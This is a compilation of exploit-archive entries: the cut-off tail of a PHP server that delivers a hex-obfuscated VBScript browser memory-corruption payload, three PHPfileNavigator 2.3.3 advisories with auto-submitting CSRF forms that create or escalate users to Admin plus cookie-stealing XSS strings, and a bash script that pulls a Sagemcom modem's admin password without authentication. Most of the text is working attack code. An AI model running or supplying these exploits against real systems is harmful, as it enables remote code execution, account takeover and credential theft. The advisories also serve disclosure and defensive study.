"\x72\x77\x28\x32\x31\x37\x36\x29\x26\x63\x68\x72\x77\x28\x30\x31\x29\x26\x63\x68\x72\x77\x28\x30". "\x30\x29\x26\x63\x68\x72\x77\x28\x30\x30\x29\x26\x63\x68\x72\x77\x28\x30\x30\x29\x26\x63\x68\x72". "\x77\x28\x30\x30\x29\x26\x63\x68\x72\x77\x28\x30\x30\x29\x0d\x0a\x20\x20\x20\x20\x20\x6d\x79\x61". "\x72\x72\x61\x79\x3d\x6d\x79\x61\x72\x72\x61\x79\x26\x63\x68\x72\x77\x28\x30\x30\x29\x26\x63\x68". "\x72\x77\x28\x33\x32\x37\x36\x37\x29\x26\x63\x68\x72\x77\x28\x30\x30\x29\x26\x63\x68\x72\x77\x28". "\x30\x29\x0d\x0a\x20\x0d\x0a\x20\x20\x20\x20\x20\x69\x66\x28\x69\x6e\x74\x56\x65\x72\x73\x69\x6f". "\x6e\x3c\x34\x29\x20\x74\x68\x65\x6e\x0d\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x64\x6f\x63\x75". "\x6d\x65\x6e\x74\x2e\x77\x72\x69\x74\x65\x28\x22\x3c\x62\x72\x3e\x20\x49\x45\x22\x29\x0d\x0a\x20". "\x20\x20\x20\x20\x20\x20\x20\x20\x64\x6f\x63\x75\x6d\x65\x6e\x74\x2e\x77\x72\x69\x74\x65\x28\x69". "\x6e\x74\x56\x65\x72\x73\x69\x6f\x6e\x29\x0d\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x72\x75\x6e". "\x73\x68\x65\x6c\x6c\x63\x6f\x64\x65\x28\x29\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20". "\x20\x20\x20\x20\x20\x20\x20\x0d\x0a\x20\x20\x20\x20\x20\x65\x6c\x73\x65\x20\x20\x0d\x0a\x20\x20". "\x20\x20\x20\x20\x20\x20\x20\x20\x73\x65\x74\x6e\x6f\x74\x73\x61\x66\x65\x6d\x6f\x64\x65\x28\x29". "\x0d\x0a\x20\x20\x20\x20\x20\x65\x6e\x64\x20\x69\x66\x0d\x0a\x20\x20\x65\x6e\x64\x20\x69\x66\x0d". "\x0a\x65\x6e\x64\x20\x66\x75\x6e\x63\x74\x69\x6f\x6e\x0d\x0a\x20\x0d\x0a\x66\x75\x6e\x63\x74\x69". "\x6f\x6e\x20\x42\x65\x67\x69\x6e\x49\x6e\x69\x74\x28\x29\x0d\x0a\x20\x20\x20\x52\x61\x6e\x64\x6f". "\x6d\x69\x7a\x65\x28\x29\x0d\x0a\x20\x20\x20\x72\x65\x64\x69\x6d\x20\x61\x61\x28\x35\x29\x0d\x0a". "\x20\x20\x20\x72\x65\x64\x69\x6d\x20\x61\x62\x28\x35\x29\x0d\x0a\x20\x20\x20\x61\x30\x3d\x31\x33". "\x2b\x31\x37\x2a\x72\x6e\x64\x28\x36\x29\x0d\x0a\x20\x20\x20\x61\x33\x3d\x37\x2b\x33\x2a\x72\x6e". "\x64\x28\x35\x29\x0d\x0a\x65\x6e\x64\x20\x66\x75\x6e\x63\x74\x69\x6f\x6e\x0d\x0a\x20\x0d\x0a\x66". "\x75\x6e\x63\x74\x69\x6f\x6e\x20\x43\x72\x65\x61\x74\x65\x28\x29\x0d\x0a\x20\x20\x4f\x6e\x20\x45". "\x72\x72\x6f\x72\x20\x52\x65\x73\x75\x6d\x65\x20\x4e\x65\x78\x74\x0d\x0a\x20\x20\x64\x69\x6d\x20". "\x69\x0d\x0a\x20\x20\x43\x72\x65\x61\x74\x65\x3d\x46\x61\x6c\x73\x65\x0d\x0a\x20\x20\x46\x6f\x72". "\x20\x69\x20\x3d\x20\x30\x20\x54\x6f\x20\x34\x30\x30\x0d\x0a\x20\x20\x20\x20\x49\x66\x20\x4f\x76". "\x65\x72\x28\x29\x3d\x54\x72\x75\x65\x20\x54\x68\x65\x6e\x0d\x0a\x20\x20\x20\x20\x20\x20\x20\x43". "\x72\x65\x61\x74\x65\x3d\x54\x72\x75\x65\x0d\x0a\x20\x20\x20\x20\x20\x20\x20\x45\x78\x69\x74\x20". "\x46\x6f\x72\x0d\x0a\x20\x20\x20\x20\x45\x6e\x64\x20\x49\x66\x20\x0d\x0a\x20\x20\x4e\x65\x78\x74". "\x0d\x0a\x65\x6e\x64\x20\x66\x75\x6e\x63\x74\x69\x6f\x6e\x0d\x0a\x20\x0d\x0a\x73\x75\x62\x20\x74". "\x65\x73\x74\x61\x61\x28\x29\x0d\x0a\x65\x6e\x64\x20\x73\x75\x62\x0d\x0a\x20\x0d\x0a\x66\x75\x6e". "\x63\x74\x69\x6f\x6e\x20\x6d\x79\x64\x61\x74\x61\x28\x29\x0d\x0a\x20\x20\x20\x20\x4f\x6e\x20\x45". "\x72\x72\x6f\x72\x20\x52\x65\x73\x75\x6d\x65\x20\x4e\x65\x78\x74\x0d\x0a\x20\x20\x20\x20\x20\x69". "\x3d\x74\x65\x73\x74\x61\x61\x0d\x0a\x20\x20\x20\x20\x20\x69\x3d\x6e\x75\x6c\x6c\x0d\x0a\x20\x20". "\x20\x20\x20\x72\x65\x64\x69\x6d\x20\x20\x50\x72\x65\x73\x65\x72\x76\x65\x20\x61\x61\x28\x61\x32". "\x29\x20\x20\x0d\x0a\x20\x20\x20\x0d\x0a\x20\x20\x20\x20\x20\x61\x62\x28\x30\x29\x3d\x30\x0d\x0a". "\x20\x20\x20\x20\x20\x61\x61\x28\x61\x31\x29\x3d\x69\x0d\x0a\x20\x20\x20\x20\x20\x61\x62\x28\x30". "\x29\x3d\x36\x2e\x33\x36\x35\x39\x38\x37\x33\x37\x34\x33\x37\x38\x30\x31\x45\x2d\x33\x31\x34\x0d". "\x0a\x20\x0d\x0a\x20\x20\x20\x20\x20\x61\x61\x28\x61\x31\x2b\x32\x29\x3d\x6d\x79\x61\x72\x72\x61". "\x79\x0d\x0a\x20\x20\x20\x20\x20\x61\x62\x28\x32\x29\x3d\x31\x2e\x37\x34\x30\x38\x38\x35\x33\x34". "\x37\x33\x31\x33\x32\x34\x45\x2d\x33\x31\x30\x20\x20\x0d\x0a\x20\x20\x20\x20\x20\x6d\x79\x64\x61". "\x74\x61\x3d\x61\x61\x28\x61\x31\x29\x0d\x0a\x20\x20\x20\x20\x20\x72\x65\x64\x69\x6d\x20\x20\x50". "\x72\x65\x73\x65\x72\x76\x65\x20\x61\x61\x28\x61\x30\x29\x20\x20\x0d\x0a\x65\x6e\x64\x20\x66\x75". "\x6e\x63\x74\x69\x6f\x6e\x20\x0d\x0a\x20\x0d\x0a\x20\x0d\x0a\x66\x75\x6e\x63\x74\x69\x6f\x6e\x20". "\x73\x65\x74\x6e\x6f\x74\x73\x61\x66\x65\x6d\x6f\x64\x65\x28\x29\x0d\x0a\x20\x20\x20\x20\x4f\x6e". "\x20\x45\x72\x72\x6f\x72\x20\x52\x65\x73\x75\x6d\x65\x20\x4e\x65\x78\x74\x0d\x0a\x20\x20\x20\x20". "\x69\x3d\x6d\x79\x64\x61\x74\x61\x28\x29\x20\x20\x0d\x0a\x20\x20\x20\x20\x69\x3d\x72\x75\x6d\x28". "\x69\x2b\x38\x29\x0d\x0a\x20\x20\x20\x20\x69\x3d\x72\x75\x6d\x28\x69\x2b\x31\x36\x29\x0d\x0a\x20". "\x20\x20\x20\x6a\x3d\x72\x75\x6d\x28\x69\x2b\x26\x68\x31\x33\x34\x29\x20\x20\x0d\x0a\x20\x20\x20". "\x20\x66\x6f\x72\x20\x6b\x3d\x30\x20\x74\x6f\x20\x26\x68\x36\x30\x20\x73\x74\x65\x70\x20\x34\x0d". "\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x6a\x3d\x72\x75\x6d\x28\x69\x2b\x26\x68\x31\x32\x30\x2b\x6b". "\x29\x0d\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x69\x66\x28\x6a\x3d\x31\x34\x29\x20\x74\x68\x65\x6e". "\x0d\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x6a\x3d\x30\x20\x20\x20\x20\x20". "\x20\x20\x20\x20\x20\x0d\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x72\x65\x64". "\x69\x6d\x20\x20\x50\x72\x65\x73\x65\x72\x76\x65\x20\x61\x61\x28\x61\x32\x29\x20\x20\x20\x20\x20". "\x20\x20\x20\x20\x20\x20\x20\x20\x0d\x0a\x20\x20\x20\x20\x20\x61\x61\x28\x61\x31\x2b\x32\x29\x28". "\x69\x2b\x26\x68\x31\x31\x63\x2b\x6b\x29\x3d\x61\x62\x28\x34\x29\x0d\x0a\x20\x20\x20\x20\x20\x20". "\x20\x20\x20\x20\x20\x20\x20\x20\x72\x65\x64\x69\x6d\x20\x20\x50\x72\x65\x73\x65\x72\x76\x65\x20". "\x61\x61\x28\x61\x30\x29\x20\x20\x0d\x0a\x20\x0d\x0a\x20\x20\x20\x20\x20\x6a\x3d\x30\x20\x0d\x0a". "\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x6a\x3d\x72\x75\x6d\x28\x69\x2b\x26\x68". "\x31\x32\x30\x2b\x6b\x29\x20\x20\x20\x0d\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x0d\x0a\x20". "\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x45\x78\x69\x74\x20\x66\x6f\x72\x0d\x0a". "\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x65\x6e\x64\x20\x69\x66\x0d\x0a\x20\x0d\x0a\x20\x20". "\x20\x20\x6e\x65\x78\x74\x20\x0d\x0a\x20\x20\x20\x20\x61\x62\x28\x32\x29\x3d\x31\x2e\x36\x39\x37". "\x35\x39\x36\x36\x33\x33\x31\x36\x37\x34\x37\x45\x2d\x33\x31\x33\x0d\x0a\x20\x20\x20\x20\x72\x75". "\x6e\x6d\x75\x6d\x61\x61\x28\x29\x20\x0d\x0a\x65\x6e\x64\x20\x66\x75\x6e\x63\x74\x69\x6f\x6e\x0d". "\x0a\x20\x0d\x0a\x66\x75\x6e\x63\x74\x69\x6f\x6e\x20\x4f\x76\x65\x72\x28\x29\x0d\x0a\x20\x20\x20". "\x20\x4f\x6e\x20\x45\x72\x72\x6f\x72\x20\x52\x65\x73\x75\x6d\x65\x20\x4e\x65\x78\x74\x0d\x0a\x20". "\x20\x20\x20\x64\x69\x6d\x20\x74\x79\x70\x65\x31\x2c\x74\x79\x70\x65\x32\x2c\x74\x79\x70\x65\x33". "\x0d\x0a\x20\x20\x20\x20\x4f\x76\x65\x72\x3d\x46\x61\x6c\x73\x65\x0d\x0a\x20\x20\x20\x20\x61\x30". "\x3d\x61\x30\x2b\x61\x33\x0d\x0a\x20\x20\x20\x20\x61\x31\x3d\x61\x30\x2b\x32\x0d\x0a\x20\x20\x20". "\x20\x61\x32\x3d\x61\x30\x2b\x26\x68\x38\x30\x30\x30\x30\x30\x30\x0d\x0a\x20\x20\x20\x0d\x0a\x20". "\x20\x20\x20\x72\x65\x64\x69\x6d\x20\x20\x50\x72\x65\x73\x65\x72\x76\x65\x20\x61\x61\x28\x61\x30". "\x29\x20\x0d\x0a\x20\x20\x20\x20\x72\x65\x64\x69\x6d\x20\x20\x20\x61\x62\x28\x61\x30\x29\x20\x20". "\x20\x20\x20\x0d\x0a\x20\x20\x20\x0d\x0a\x20\x20\x20\x20\x72\x65\x64\x69\x6d\x20\x20\x50\x72\x65". "\x73\x65\x72\x76\x65\x20\x61\x61\x28\x61\x32\x29\x0d\x0a\x20\x20\x20\x0d\x0a\x20\x20\x20\x20\x74". "\x79\x70\x65\x31\x3d\x31\x0d\x0a\x20\x20\x20\x20\x61\x62\x28\x30\x29\x3d\x31\x2e\x31\x32\x33\x34". "\x35\x36\x37\x38\x39\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x30\x31\x32\x33\x34\x35\x36\x37\x38". "\x39\x30\x0d\x0a\x20\x20\x20\x20\x61\x61\x28\x61\x30\x29\x3d\x31\x30\x0d\x0a\x20\x20\x20\x20\x20". "\x20\x20\x20\x20\x20\x20\x0d\x0a\x20\x20\x20\x20\x49\x66\x28\x49\x73\x4f\x62\x6a\x65\x63\x74\x28". "\x61\x61\x28\x61\x31\x2d\x31\x29\x29\x20\x3d\x20\x46\x61\x6c\x73\x65\x29\x20\x54\x68\x65\x6e\x0d". "\x0a\x20\x20\x20\x20\x20\x20\x20\x69\x66\x28\x69\x6e\x74\x56\x65\x72\x73\x69\x6f\x6e\x3c\x34\x29". "\x20\x74\x68\x65\x6e\x0d\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x6d\x65\x6d\x3d\x63\x69". "\x6e\x74\x28\x61\x30\x2b\x31\x29\x2a\x31\x36\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20". "\x0d\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x6a\x3d\x76\x61\x72\x74\x79\x70\x65\x28\x61". "\x61\x28\x61\x31\x2d\x31\x29\x29\x0d\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x69\x66\x28". "\x28\x6a\x3d\x6d\x65\x6d\x2b\x34\x29\x20\x6f\x72\x20\x28\x6a\x2a\x38\x3d\x6d\x65\x6d\x2b\x38\x29". "\x29\x20\x74\x68\x65\x6e\x0d\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x69\x66". "\x28\x76\x61\x72\x74\x79\x70\x65\x28\x61\x61\x28\x61\x31\x2d\x31\x29\x29\x3c\x3e\x30\x29\x20\x20". "\x54\x68\x65\x6e\x20\x20\x20\x20\x0d\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20". "\x20\x20\x20\x49\x66\x28\x49\x73\x4f\x62\x6a\x65\x63\x74\x28\x61\x61\x28\x61\x31\x29\x29\x20\x3d". "\x20\x46\x61\x6c\x73\x65\x20\x29\x20\x54\x68\x65\x6e\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20". "\x20\x20\x0d\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x74". "\x79\x70\x65\x31\x3d\x56\x61\x72\x54\x79\x70\x65\x28\x61\x61\x28\x61\x31\x29\x29\x0d\x0a\x20\x20". "\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x65\x6e\x64\x20\x69\x66\x20\x20\x20". "\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x0d\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20". "\x20\x20\x20\x20\x65\x6e\x64\x20\x69\x66\x0d\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x65". "\x6c\x73\x65\x0d\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x72\x65\x64\x69\x6d\x20". "\x20\x50\x72\x65\x73\x65\x72\x76\x65\x20\x61\x61\x28\x61\x30\x29\x0d\x0a\x20\x20\x20\x20\x20\x20". "\x20\x20\x20\x20\x20\x20\x20\x65\x78\x69\x74\x20\x20\x66\x75\x6e\x63\x74\x69\x6f\x6e\x0d\x0a\x20". "\x0d\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x65\x6e\x64\x20\x69\x66\x20\x0d\x0a\x20\x20". "\x20\x20\x20\x20\x20\x20\x65\x6c\x73\x65\x0d\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x69". "\x66\x28\x76\x61\x72\x74\x79\x70\x65\x28\x61\x61\x28\x61\x31\x2d\x31\x29\x29\x3c\x3e\x30\x29\x20". "\x20\x54\x68\x65\x6e\x20\x20\x20\x20\x0d\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20". "\x20\x49\x66\x28\x49\x73\x4f\x62\x6a\x65\x63\x74\x28\x61\x61\x28\x61\x31\x29\x29\x20\x3d\x20\x46". "\x61\x6c\x73\x65\x20\x29\x20\x54\x68\x65\x6e\x0d\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20". "\x20\x20\x20\x20\x20\x20\x20\x74\x79\x70\x65\x31\x3d\x56\x61\x72\x54\x79\x70\x65\x28\x61\x61\x28". "\x61\x31\x29\x29\x0d\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x65\x6e\x64\x20". "\x69\x66\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x0d\x0a\x20\x20\x20\x20\x20". "\x20\x20\x20\x20\x20\x20\x20\x65\x6e\x64\x20\x69\x66\x0d\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x65". "\x6e\x64\x20\x69\x66\x0d\x0a\x20\x20\x20\x20\x65\x6e\x64\x20\x69\x66\x0d\x0a\x20\x20\x20\x20\x20". "\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x0d\x0a\x20\x20\x20\x20\x20\x0d\x0a\x20\x20\x20\x20\x49". "\x66\x28\x74\x79\x70\x65\x31\x3d\x26\x68\x32\x66\x36\x36\x29\x20\x54\x68\x65\x6e\x20\x20\x20\x20". "\x20\x20\x20\x20\x20\x0d\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x4f\x76\x65\x72\x3d\x54\x72". "\x75\x65\x20\x20\x20\x20\x20\x20\x0d\x0a\x20\x20\x20\x20\x45\x6e\x64\x20\x49\x66\x20\x20\x0d\x0a". "\x20\x20\x20\x20\x49\x66\x28\x74\x79\x70\x65\x31\x3d\x26\x68\x42\x39\x41\x44\x29\x20\x54\x68\x65". "\x6e\x0d\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x4f\x76\x65\x72\x3d\x54\x72\x75\x65\x0d\x0a". "\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x77\x69\x6e\x39\x78\x3d\x31\x0d\x0a\x20\x20\x20\x20\x45". "\x6e\x64\x20\x49\x66\x20\x20\x0d\x0a\x20\x0d\x0a\x20\x20\x20\x20\x72\x65\x64\x69\x6d\x20\x20\x50". "\x72\x65\x73\x65\x72\x76\x65\x20\x61\x61\x28\x61\x30\x29\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20". "\x0d\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x0d\x0a\x65\x6e\x64\x20\x66\x75\x6e\x63\x74\x69\x6f". "\x6e\x0d\x0a\x20\x0d\x0a\x66\x75\x6e\x63\x74\x69\x6f\x6e\x20\x72\x75\x6d\x28\x61\x64\x64\x29\x20". "\x0d\x0a\x20\x20\x20\x20\x4f\x6e\x20\x45\x72\x72\x6f\x72\x20\x52\x65\x73\x75\x6d\x65\x20\x4e\x65". "\x78\x74\x0d\x0a\x20\x20\x20\x20\x72\x65\x64\x69\x6d\x20\x20\x50\x72\x65\x73\x65\x72\x76\x65\x20". "\x61\x61\x28\x61\x32\x29\x20\x20\x0d\x0a\x20\x20\x20\x0d\x0a\x20\x20\x20\x20\x61\x62\x28\x30\x29". "\x3d\x30\x20\x20\x20\x0d\x0a\x20\x20\x20\x20\x61\x61\x28\x61\x31\x29\x3d\x61\x64\x64\x2b\x34\x20". "\x20\x20\x20\x20\x0d\x0a\x20\x20\x20\x20\x61\x62\x28\x30\x29\x3d\x31\x2e\x36\x39\x37\x35\x39\x36". "\x36\x33\x33\x31\x36\x37\x34\x37\x45\x2d\x33\x31\x33\x20\x20\x20\x20\x20\x20\x20\x0d\x0a\x20\x20". "\x20\x20\x72\x75\x6d\x3d\x6c\x65\x6e\x62\x28\x61\x61\x28\x61\x31\x29\x29\x20\x20\x0d\x0a\x20\x20". "\x20\x20\x0d\x0a\x20\x20\x20\x20\x61\x62\x28\x30\x29\x3d\x30\x0d\x0a\x20\x20\x20\x20\x72\x65\x64". "\x69\x6d\x20\x20\x50\x72\x65\x73\x65\x72\x76\x65\x20\x61\x61\x28\x61\x30\x29\x0d\x0a\x65\x6e\x64". "\x20\x66\x75\x6e\x63\x74\x69\x6f\x6e\x0d\x0a\x20\x0d\x0a\x3c\x2f\x73\x63\x72\x69\x70\x74\x3e\x0d". "\x0a\x20\x0d\x0a\x3c\x2f\x62\x6f\x64\x79\x3e\x0d\x0a\x3c\x2f\x68\x74\x6d\x6c\x3e"; $msgd=str_replace("FILE_DOWNLOAD",$link,$msgd); for (;;) { if ($client = @socket_accept($reza)) { socket_write($client, "HTTP/1.1 200 OK\r\n" . "Content-length: " . strlen($msgd) . "\r\n" . "Content-Type: text/html; charset=UTF-8\r\n\r\n" . $msgd); print "\n Target Checked Your Link \n"; } else usleep(100000); } ?>

[+] Credits: John Page aka hyp3rlinx [+] Website: hyp3rlinx.altervista.org [+] Source: http://hyp3rlinx.altervista.org/advisories/AS-PHPFILENAVIGATOR0812b.txt Vendor: ========================= pfn.sourceforge.net Product: ===================================================== PHPfileNavigator v2.3.3 (pfn) Is state-of-the-art, open source web based application to complete manage your files and folders. Vulnerability Type: ============================= Privilege Escalation CVE Reference: ============== N/A Vulnerability Details: ===================== We can elevate privileges from that of a regular user to an Admin level. In order for the attack to succeed and escalate privileges to become Admin you need know your ID for the 'id_usuario' field when executing the attack. Tested using xampp-1.7.0 Exploit code(s): =============== <!DOCTYPE> <html> <script> function pwn(){ var e=document.getElementById('ELEVATO_DE_PRIVLOS') e.submit() } </script> <body onLoad="pwn()"> <!-- Escalate privs to that of Admin --> <form id="ELEVATO_DE_PRIVLOS" action=" http://localhost/PHPfileNavigator/pfn-2.3.3/xestion/usuarios/gdar.php" method="post"> <input type="hidden" name="id_usuario" value="5" /> <input type="text" id="nome" name="nome" value="b2" class="text" tabindex="10" /> <input type="text" id="usuario" name="usuario" value="b2" class="text" tabindex="20" /> <input type="password" id="contrasinal" name="contrasinal" value="abc123" class="text" tabindex="30" /> <input type="password" id="rep_contrasinal" name="rep_contrasinal" value="abc123" class="text" tabindex="40" /> <input type="text" id="email" name="email" value="b@b.com" class="text" tabindex="50" /> <input type="text" id="max_descargas" name="max_descargas" value="0" class="text" tabindex="60" /> <input type="text" id="actual_descargas" name="actual_descargas" value="0" class="text" tabindex="70" /> <select id="cambiar_datos" name="cambiar_datos" tabindex="75"> <option value="1" >ON</option> <option value="0" selected="selected">OFF</option> </select> <select id="id_grupo" name="id_grupo" tabindex="80"> <option value="1" selected="selected">Administrators</option> </select> <select id="admin" name="admin" tabindex="90"> <option value="1" selected="selected">ON</option> <option value="0">OFF</option> </select> <select id="estado" name="estado" tabindex="100"> <option value="1" selected="selected">ON</option> <option value="0" >OFF</option> </select> <input type="checkbox" id="Fraices_1" name="Fraices[]" value="1" class="checkbox" /> </form> </body> </html> Disclosure Timeline: ========================================================= Vendor Notification: August 8, 2015 August 12, 2015 : Public Disclosure Severity Level: ========================================================= High Description: ========================================================== Request Method(s): [+] POST Vulnerable Product: [+] PHPfileNavigator v2.3.3 (pfn) Vulnerable Parameter(s): [+] id_grupo, admin, id_usuario Affected Area(s): [+] Admin =========================================================== [+] Disclaimer Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and prohibits any malicious use of all security related information or exploits by the author or elsewhere. by hyp3rlinx

[+] Credits: John Page aka hyp3rlinx [+] Website: hyp3rlinx.altervista.org [+] Source: http://hyp3rlinx.altervista.org/advisories/AS-PHPFILENAVIGATOR0812a.txt Vendor: ================================ pfn.sourceforge.net Product: =================================== PHPfileNavigator v2.3.3 (pfn) Is state-of-the-art, open source web based application to complete manage your files and folders. Vulnerability Type: ================================ CSRF add arbitrary user accounts CVE Reference: ============== N/A Vulnerability Details: ===================== No CSRF token exists when creating user accounts, this allows us to exploit the application and add arbitrary users The ?PHPSESSID= cookie used in URL is useless as we can just replace the value with whatever. e.g. ?PHPSESSID='inthesignofevil' or just omit it all together makes no difference exploit will still succeed. Next create our form POST and a self calling Javascript function, then get a logged in user to click our malicious linx or visit our webpage where they will be PWN3D. Tested using xampp-1.7.0 Exploit code(s): =============== <!DOCTYPE> <html> <!-- CSRF exploit add arbitrary user accounts with Admin privs --> <form id="USERIOS_EVILOS" action=" http://localhost/PHPfileNavigator/pfn-2.3.3/xestion/usuarios/gdar.php?PHPSESSID=inthesignofevil" method="post"> <input type="hidden" name="id_usuario" value="" /> <input type="text" id="nome" name="nome" value="hyp3rlinx" class="text" tabindex="10" /> <input type="text" id="usuario" name="usuario" value="hyp3rlinx" class="text" tabindex="20" /> <input type="password" id="contrasinal" name="contrasinal" value="abc123" class="text" tabindex="30" /> <input type="password" id="rep_contrasinal" name="rep_contrasinal" value="abc123" class="text" tabindex="40" /> <input type="text" id="email" name="email" value="hell@abysmalgod.com" class="text" tabindex="50" /> <input type="text" id="max_descargas" name="max_descargas" value="0" class="text" tabindex="60" /> <input type="text" id="actual_descargas" name="actual_descargas" value="0" class="text" tabindex="70" /> <select id="cambiar_datos" name="cambiar_datos" tabindex="75"> <option value="1" >ON</option> <option value="0" selected="selected">OFF</option> </select> <select id="id_grupo" name="id_grupo" tabindex="80"> <option value="0" selected="selected">Administrators</option> </select> <select id="admin" name="admin" tabindex="90"> <option value="1" selected="selected">ON</option> <option value="0" >OFF</option> </select> <select id="estado" name="estado" tabindex="100"> <option value="1" selected="selected">ON</option> <option value="0" >OFF</option> </select> <input type="checkbox" id="Fraices_1" name="Fraices[]" value="1" class="checkbox" /> </form> <script> (function PWN3D(){ var e=document.getElementById('USERIOS_EVILOS') e.submit() })() </script> </body> </html> Disclosure Timeline: ========================================================= Vendor Notification: August 8, 2015 August 12, 2015 : Public Disclosure Severity Level: ========================================================= High Description: ========================================================== Request Method(s): [+] POST Vulnerable Product: [+] PHPfileNavigator v2.3.3 (pfn) Vulnerable Parameter(s): [+] id_usuario, id_grupo Affected Area(s): [+] Admin =========================================================== [+] Disclaimer Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and prohibits any malicious use of all security related information or exploits by the author or elsewhere. by hyp3rlinx

[+] Credits: John Page aka hyp3rlinx [+] Website: hyp3rlinx.altervista.org [+] Source: http://hyp3rlinx.altervista.org/advisories/AS-PHPFILENAVIGATOR0812c.txt Vendor: ================================ pfn.sourceforge.net Product: =================================== PHPfileNavigator v2.3.3 (pfn) Is state-of-the-art, open source web based application to complete manage your files and folders. Vulnerability Type: ========================= Persistent & Reflected XSS CVE Reference: ============== N/A Vulnerability Details: ===================== Multiple persistent XSS vulnerable fields exist on the 'Modify User' form. nome, usuario, email etc... We can leverage existing CSRF vulnerability to update a victimz profile and store malicious XSS payload or an malicious user can inject there own payloads when updating thier profilez affecting other users and the security of the whole application. Multiple reflected XSS exists as well for following PHP pages all with same vulnerable parameter 'dir' when issuing GET requests. pfn-2.3.3 application seems to filter out <script> tags etc, but we can bypass this using <DIV onMouseMove= JS functions!. navega.php accion.php preferencias.php Tested using xampp-1.7.0 Exploit code(s): =============== Persistent XSS: --------------- POST URL: http://localhost/PHPfileNavigator/pfn-2.3.3/xestion/usuarios/index.php?PHPSESSID= e.g. Inject <script>alert(666)</script> into the 'Name*', 'User*' or 'Email' field and click Accept button. Injecting XSS into 'name' field will store the XSS payload in the pfn MySQL database in 'pfn_usuarios' table called 'nome' in the 'nome' column. The Same fate will happen for other injected fields 'email & 'usuario'. Reflected XSS: -------------- 1) http://localhost/PHPfileNavigator/pfn-2.3.3/navega.php?PHPSESSID=HELL&dir= " <DIV onMouseMove= "alert(document.cookie) " </a> 2) http://localhost/PHPfileNavigator/pfn-2.3.3/accion.php?accion=buscador&PHPSESSID=HELL&dir= " <DIV onMouseMove= "alert(document.cookie) " </a> 3) http://localhost/PHPfileNavigator/pfn-2.3.3/preferencias.php?PHPSESSID=HELL&dir= " <DIV onMouseMove= "alert(document.cookie) " </a> Disclosure Timeline: ========================================================= Vendor Notification: August 8, 2015 August 12, 2015 : Public Disclosure Severity Level: ========================================================= Medium Description: ========================================================== Request Method(s): [+] POST / GET Vulnerable Product: [+] PHPfileNavigator v2.3.3 (pfn) Vulnerable Parameter(s): [+] nome, usuario, email, dir Affected Area(s): [+] Admin =========================================================== [+] Disclaimer Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and prohibits any malicious use of all security related information or exploits by the author or elsewhere. by hyp3rlinx

#!/bin/bash ######################################### # Exploit Title: Sagemcom 3864 V2 get admin password # Date 2015-08-15 # Author: Cade Bull # Software Link: null # Tested on: Sagemcom F@ST 3864 V2 # Version: 7.253.2_F3864V2_Optus ######################################### # The sagemcom modem does not authenticate users when requesting pages, only whilst posting forms # the password.html page loads the admin password in clear text and stores it in Javascript, which is viewable without any credentials if [ "$1" != "" ] then IP_ADDRESS="$1" else echo "Usage : $0 IP_ADDRESS" exit 1 fi USER_PASSWORD=`wget http://$IP_ADDRESS/password.html -t 1 -q -O - | grep "pwdAdmin" | tr " = " "\n" | grep "'" | tr -d "';" ` echo "admin password = $USER_PASSWORD"

